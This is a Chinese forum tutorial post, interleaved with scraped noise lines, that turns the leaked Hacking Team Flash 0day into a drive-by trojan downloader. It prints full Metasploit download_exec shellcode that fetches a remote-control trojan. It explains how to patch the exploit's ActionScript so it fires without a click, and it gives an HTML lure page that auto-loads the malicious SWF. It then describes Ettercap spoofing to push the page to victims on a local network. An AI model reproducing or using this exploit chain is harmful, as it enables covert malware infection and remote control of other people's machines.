|
- x$ ^- H3 e, L5 K' w4 M
三、flash 0day之手工代码修改制作下载者实例入侵演示 0 [! C; Y J6 S/ R* N) c2 [
" A( J' }5 a/ {, g- P& O
1 q; I% Y# F6 ^
利用到的工具:
' O l, i0 }9 A0 L7 w5 p. L5 ?: r/ J 3 q: [. N3 o& o* ?& B5 W3 x1 y
3 ]- |: F$ P+ x g Msf
6 ?7 N% q2 Q: Y9 B) C; ? 2 s3 B+ C2 `' M
! t3 G% F% c9 [9 Z8 ?. w. z
Ettercap 6 i1 n. T5 i' S9 t3 T2 Z* M3 ~
6 d- B- A3 H8 B' m
9 e0 X' K. O V1 |5 C. D
Adobe Flash CS6
7 [6 E/ y/ u8 `( N 3 n3 y, J" k# Q/ j a+ {
# w6 `4 x+ R2 W5 r8 E9 E
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
+ _3 F+ D D' h% N5 _
9 Q9 c8 T/ d7 `! a
& z. B( Z- w0 H( G$ A Q 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
+ @# k! _- W Z7 f8 Q
4 f8 C" t: t; U3 r% j2 ~7 K- X$ a' r2 L0 c S" V4 q6 G' A
如图: 7 X& v, D0 _6 x) g
( r5 M3 g7 J( d2 D+ Q5 i! _ A: s2 i6 V8 q( b0 R0 ]# m
* b& a- b w9 d# J 3 E& ^% F8 S9 C$ {3 N
2 m2 f) o- o$ P+ N+ v- J; e8 G
 Z3 E& ^, s0 Z( ]/ N6 I
- H( [ |- v1 ?# u: Y9 {- m
% U; K$ P+ M4 u5 m2 B: W 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) O- D# c, {) O2 Y f+ B) {
& t) J+ P, Q. E9 f
* B. P% ^' B/ @) v: N5 V5 l
% s0 Y5 M5 W# K" q1 {5 s- { & j0 m( u2 K6 e h* ^
& X3 m8 ~; k; d 
9 C q' @+ I6 s. g% ]8 v1 L3 I . }. M3 i1 Q" Z& ] X! q
4 l* M7 e$ Z* P: I9 L
然后执行generate -t dword生成shellcode,如下: 5 J& W* x Y+ x$ x9 Y1 o5 L7 S
7 Y; o7 S' T( Z( e, Y( n3 Y- K& C
: Q% M% k0 h- F1 k) ^. r  . ]) T% l: Y2 X4 G( k
; v8 R$ |# {$ {3 J w" `+ R
1 W' }% [6 u3 Y# D+ J1 u- z 复制代码到文本下便于我们一会编辑flash exp,如下: , [2 ]. X: ]" V) }1 [( _- U5 R3 A
5 A4 U, [* v( j" L3 q1 B* T, q# v5 H
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
, _9 w3 z X5 Z& Y! L& n
- P& I; o' K! L6 _
2 ?0 D, Z8 {4 j$ R 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ; R r" L" F, p# Q" L* a2 m
8 W/ y# m- {6 q# D! w, w
# v* U7 C. F' n) _5 M2 ^' R5 E6 z9 u( A, M 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ( ?- a" G- R# B* m* I- b
4 L4 c& k, D4 Z
v/ j; G/ F% |+ H H* L P% J 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 4 v' E" u' V( D. t
$ z, i2 Y7 @2 x5 q, n7 Q# B0 `: F6 R/ g9 D
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
9 R [6 J) u" Z1 B' U5 j9 O3 M 5 J* C2 q$ J0 G C
4 ]6 H- }8 H* N) E. t
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
5 \: S; n* \: f: Y. F" I2 A' R 2 F# Q- b C, h, a2 W: J
7 ~, s1 \3 i: `5 o 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 2 I% o r* E% I. x: S
$ z2 s" D9 z j. K' K( h0 Z7 a! L. |$ w0 |5 V, g9 H+ z
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ' P: G" M% X' u, U4 O
6 L2 [0 H, C- i2 ^
4 G+ q9 _5 Y' K" X0 U, j' v 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
! p2 c: L+ D, F! y
D9 R! a4 `8 b2 b8 Y, U! p
$ ]- S; s7 {# x5 t8 T 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 4 O7 k# [* l4 e Q; p6 K7 w- f
; S1 R4 `, B q' v2 J+ v; R
- @( B( M% l' {& h 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
7 @& _! T u+ s' ^( b b& z$ \% b2 f0 v& n
( l0 h) ?' }, n7 r5 Z 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + l* H+ e" [$ u; n, n" c7 R) S
( w |6 k4 D) n' x5 _2 j- d! p% S+ \1 j- ?8 o5 Y- R5 S: D
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
! N, u- H0 m2 G7 J( b 0 \- s% X1 y1 j ^" w
. P$ }5 Q8 p7 B) D6 ?( Q, H 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 + c3 Q2 k. J! Z& D
8 l& c3 q t+ D% C7 H
4 ]) T& l+ R& B9 J o2 a
h" l) H( r# f. W, Q
4 m1 K1 h- M* {7 M
" x7 |: }- @. Q# S% N) Y' j * l: x. G# r$ _
1 ]5 _; \- i& A7 i9 ^8 y
/ u/ E# J! ]6 x5 y1 r/ P 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 3 a- i' I! n' k# q' B
# U U* ^8 B, O z4 C8 `& h: g2 b; |, T) h: s9 }5 @/ N( b7 Z
 5 q7 u9 n- H, g/ \: J* \
6 q/ b; Y% D4 j. T3 L. n$ w
& G8 c Y; p5 f+ ~
先修改ShellWin32.as,部分源代码如图:
2 R4 [) L# c' c3 ]) Z$ i 9 h7 i' J4 n0 O5 W" i) R9 O
# x' o" i: e/ o. i
. ?$ A1 o8 s( g7 X9 h8 @ , O: Y: r$ C4 j1 W; B* a
5 a) H" W4 y6 _1 t' T6 `
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: : i$ q% ^; a- y0 Y/ ~1 }
/ s7 t& F5 O4 [: ^+ e6 N
+ O* n# T8 W! K  7 P- k8 w& y6 Z0 \* O
5 Z" ]0 I6 q5 u: p( K% ]% f# f
1 T/ [# ^1 G5 } 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: : k! F+ F- i- Z1 ]9 s' L. X
$ M' v* y9 ~' U, @; M V* y! a
! }4 |* s: w3 U5 q) E3 G0 m$ ?0 S  H' `$ ? }6 D) S R0 F
1 ~, f* ^; n7 q! z% V1 X
/ z" Y2 M9 H- x# k' S 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
6 e5 [9 G1 f0 [5 j
0 `1 c0 f7 v; [' I0 Q/ k/ O0 K" @0 f2 P
/ ]" p5 q& z: @6 S
3 J$ K: Y5 e- l4 { F, A2 Y; _2 i2 N. v# S
/ F' H u+ w9 |" e0 z2 v8 m " X& @$ U" f% P" K- G
9 i+ Z0 A3 R$ }1 j* Q8 m$ M5 D
' y0 }; C9 Q/ ?& y$ l
% ^! ?2 J U/ h" O) K7 M) Q6 F8 G+ M0 a+ P) z
然后点保存,下面我们来编译一下,打开
: Y$ ^9 Y0 ^4 R8 V V' x
8 m9 ]4 h8 _8 z. f% w9 p. [- [
3 h) J* Q/ {3 J exp1.fla然后点文件-发布,看看编译没错误 , S; ~3 Z* j2 r9 V8 e
4 f. J0 B. s, b/ O
. |' v$ D2 O# o3 F) O5 I
% T* v( F' I. d+ e
7 Q" x* Q3 k' y) U, W
8 k6 ^7 t; C( D- N5 j% p, X1 q
# }! `4 |6 `/ M* D$ \- f
# p, S4 M& j8 d* u j* I1 ]8 ?# N1 H
; D& w( @ ]! b" d3 e/ k
& m+ o( A& t) u0 P. g& Y
1 {' K* Q7 x+ m; A0 e' S8 i
6 @' ^1 P( y/ u$ x$ D, U 
1 q2 s' w4 j, U- k! K. n' l! C
Q# [) L. e5 I& g" |& U! g) E. O+ x& W+ w# `5 y# N
然后我们把生成的 * `5 A, ?/ _% f( ^$ R
- `+ c. N1 g+ b0 J
7 y2 G* k1 f1 q- G6 z7 P
exp1.swf丢到kailinux 的/var/www/html下:
, _4 \8 s' v# h" G2 a* p 9 t$ {( i x1 @ W; U7 `$ q
8 ~2 [$ P; B& m; h7 {/ I 然后把这段代码好好编辑一下
8 O/ u5 a6 S) _. x 9 U' [! X$ T4 L. s
; Z5 m, h$ D! M0 s% u
" h7 z- x2 m1 U 1 ~: ?+ t7 T" v X+ H
3 P0 ?, A- R3 y' p, y0 j& i" x' q% S . z. `6 r! n" `9 m$ I: I
3 Z: l3 p9 Q, Y- N5 ]
0 E6 O6 R7 t2 s: i
4 z: \# C% E x1 p8 R $ V8 p; B+ y7 R) H
6 P5 o% |" u. W2 V z/ j: E+ L
5 H9 Y. Q! d& |- h* O
Z. _; g9 G/ @* H& x6 T8 F& Q4 L
: \) G) A6 I( B: H- T 0 P: R7 z$ z6 S. r0 p7 x
7 O1 v* f0 a4 m* o+ d
' k. d1 D6 V# _. a- ?- T8 n# p) s9 c % k7 c* W. t* ?6 R r
& ~7 `7 _: d" D5 }" y
R: d4 k0 h& I. E/ M9 h5 w
<!DOCTYPE html> ' t7 S/ s9 Y# b) N2 V4 f6 s- c
8 o6 W+ z* B; l$ x1 m# F
/ l" [3 \" X6 T7 k% @2 m <html>
: K( o3 P- B. B9 L! S
# Z9 c" c1 g& |! d) W/ u9 ?% ?3 O G, b
& S" n* _' X# p' o* L; E# r <head>
: `* D1 e* y6 h( T5 q % E& R7 |/ q9 C# m" R
* H, J: C1 k/ S3 @ <meta http-equiv="Content-Type" content="text/html;
( K+ p# f+ r, [& Y. @9 ]0 F, F " Z$ U0 a2 a1 `. c/ \2 E, u" N
2 z. e( y R: s; ^. U, X3 i
charset=utf-8"/>
7 M% r7 I* Z- s* C
% n. G. Y; i5 u ~5 [- O9 G1 a" R1 c B' P6 P( U4 F
</head>
6 g: _, l/ J) O6 O ! e" j! D; Y' V; K5 W& P
: \% t' c+ _, W; K- a' k8 X ^ <body> 1 @4 X9 }" |% U: G
1 T4 n5 [ `7 |$ {
5 {. r" t: u: C( O( w% ~ <h2> Please wait, the requested page is loading...</h2> , _7 U, [9 u5 v4 d" p' X$ O& f
" _# ?9 L' k! d4 k9 s- W9 q( O1 S/ R3 Y3 l- G9 C4 O! T, X$ |* e
<br> 2 l1 M3 Z/ Z$ ]
p. v! d) N! d1 T2 H9 e* v4 H( e% G, ?2 B$ E) p
<OBJECT : @9 y1 N; r; x0 E% a9 G
6 G* ^ t3 o, p& H G f
' f( q E. E ]3 |7 I5 t classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 6 m5 M/ D: x2 b3 b$ Y* ]( @5 J: }
3 ], ~; ?. D! l ^5 G6 H
, D* g$ l9 W( n/ @+ \3 V9 d VALUE="http://192.168.0.109/exp1.swf"></OBJECT> / I( k+ v* k; w1 M1 r- E
: t9 G# E# V& G$ ?1 D
2 ?6 p9 B# j, [% n: e5 ^9 t </body> * S) _/ q5 M* E5 d: C
7 J- e/ y! C3 {* z
. G0 A/ i) ^/ `3 W# Z5 U" k <script>
$ i; n/ O. h+ O: Y7 N0 b3 Q 5 r) G" Q/ P) |) a/ ~ r
* w5 M9 N! C- P( x9 p- z setTimeout(function () { % _" W1 @% Y! d, L' y
|/ D0 C# Z) {7 z: W
0 q- Q ^: o# V) X6 f
[: y; l& W. s1 ?8 U/ R# @
x1 ^+ B/ Y# {2 F R' `% L: H9 F3 c
2 [3 [1 l* Q5 b window.location.reload(); 9 d1 C$ b2 c7 x+ K' ^
) L( X2 x. J6 Q9 ?' [$ Y, J5 G6 F3 L( S
}, 10000); & q1 D) n3 d4 d" l2 n0 D
' o- E9 j7 e8 h0 d5 l0 r9 Q# w: H
; M9 Q) K9 ^. G D# Y% l, s
8 m. n; r: E" T 7 E5 W- d+ E8 n2 a
0 w9 [3 t) ^ y
</script> ( n+ Y* h4 v0 \# b B
4 b, W. T3 N' q: s
- m7 k( W2 w5 D, Q </html> - P+ Z3 c4 x. x; O0 l2 T; v
3 |, f$ t, B8 ~! R. P
3 ^- g% T% v4 p3 ?+ C: n
; |9 \( y- f. N/ o! l# Y; L
" o1 @. G$ C* N2 S
0 d- x$ l+ L& H5 P& a 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
0 ~ E$ }: ^, o5 ?4 W. e % a6 x$ z5 }% k) K a4 M
4 A; P) P }' n6 M' y! u 
; d" g$ r x* x9 m6 }0 c* ^ : ]# W/ T- o( A% ^, R4 k' k
% a$ \1 e+ M u* f $ @0 z7 ?9 u8 n+ S
$ L) [* L5 Q. }0 V/ r7 \& A2 W
2 p, j/ `) I+ X2 G6 K
. P& i* v# O' B9 k. b2 I1 M
h( A$ ^ v8 f/ _% ?- C5 G
, [5 k1 ^) {6 _- ]9 h1 C8 u
5 V$ `) k' f' g) Q( y& d5 M0 |0 G $ d1 x$ g# S4 B: T+ X
+ q, e" s4 V) M& W: |. s
+ t% J, H3 A$ [0 I: t' ^+ o - B. v# d6 ?8 V# M3 D8 h
0 R6 U7 Q0 o* y, J% \' P$ x 下面我们用ettercap欺骗如图:
9 t9 @1 {3 X0 G$ L+ j J L
) q. O+ H1 E% u" W) y, L+ F0 O- Z7 e
5 o2 d# z- Q2 `; i# W 8 J% ^7 L" t- j" k6 e: e0 o
. D5 B+ n* p3 O$ ~
: H6 K9 j& o& n3 Y, W$ T* m) c' E6 g
4 p0 d) d8 Y' N$ @& N6 c& \4 d" W3 X4 n( ^* `
下面我们随便访问个网站看看:
& o n" u" s' ~$ y9 A$ I ) X4 ^8 k" h* B
; Y5 ]* ~( v/ M! ~ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
: _' Z( T9 @. Q8 O" t' s & k* }1 W( o7 I. u( J9 \9 J
$ F* K2 _1 {5 v
 & i4 @/ J, S+ n. Q3 l& ?3 r x/ n
3 ?* q# w0 {- D7 I4 N! v. l6 a" Y' w/ m9 @# v3 W2 ~; m
我们看另一台, : H5 `& m: u* x+ H- [% I
& \5 _7 b, q$ Q9 `! O5 l- [6 m/ a9 y" x* Q8 U1 \1 O8 S
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
* x7 T; }/ H( O/ {5 R8 Y/ ]+ o* G | 
发表于 2018-10-20 20:28:55
收藏
支持
反对